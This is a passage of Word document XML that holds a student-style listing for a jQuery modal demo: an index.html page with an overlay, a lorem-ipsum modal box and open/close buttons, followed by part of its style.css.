    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">DUOTA: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="004A6C2B" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="720" w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="000262D2" w:rsidRPr="00AD4464">
        <w:t>index.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>&lt;html lang="en"&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head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;meta charset="UTF-8"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;meta http-equiv="X-UA-Compatible" content="ie=edge"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;title&gt;Modal jQuery&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>&lt;/head&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body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;h1&gt;Modal&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;div class="overlay"&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;div class="modal"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;h2&gt;Modal Box&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;p&gt;Lorem ipsum dolor sit amet consectetur adipisicing elit. Corrupti perspiciatis magnam eum sed similique rerum laboriosam amet adipisci explicabo ipsa.&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;button class="close"&gt;Close&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;/div&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 xml:space="preserve">    &lt;button class="open"&gt;Open&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00086BF0" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="720" w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="000262D2" w:rsidRPr="00AD4464">
        <w:t>style.css</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>html {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>min-height: 100%;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>font-family: 'Nunito', sans-serif;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>-webkit-font-smoothing: antialiased;</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ody {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>background: linear-gradient(to bottom right, #30cfd0, #f6d365);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>line-height: 1.5;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>text-align: center;</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h1 {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>font-weight: 200;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>font-size: 3rem;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>color: white;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>text-align: center;</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overlay {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>position: fixed;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>top: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>left: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>width: 100%;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>height: 100%;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>background: rgba(0, 0, 0, 0.5);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>opacity: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>transition: .5s ease;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>z-index: -1;</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overlay.active {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>opacity: 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>z-index: 2;</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modal {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>max-height: calc(100% - 100px);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>position: fixed;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>top: 50%;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>left: 50%;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>max-width: 450px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>transform: translate(-50%, -50%);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>color: #4a5666;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>background: linear-gradient(to bottom right, white, #F8F8F8) !important;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">  box-shadow: 0 15px 20px -15px rgba(0, 0, 0, 0.3), 0 35px 50px -25px rgba(0, 0, 0, 0.3), 0 85px 60px -25px rgba(0, 0, 0, 0.1);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>z-index: 3;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>visibility: hidden;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>opacity: 0;</w:t>
      </w:r>
    </w:p>
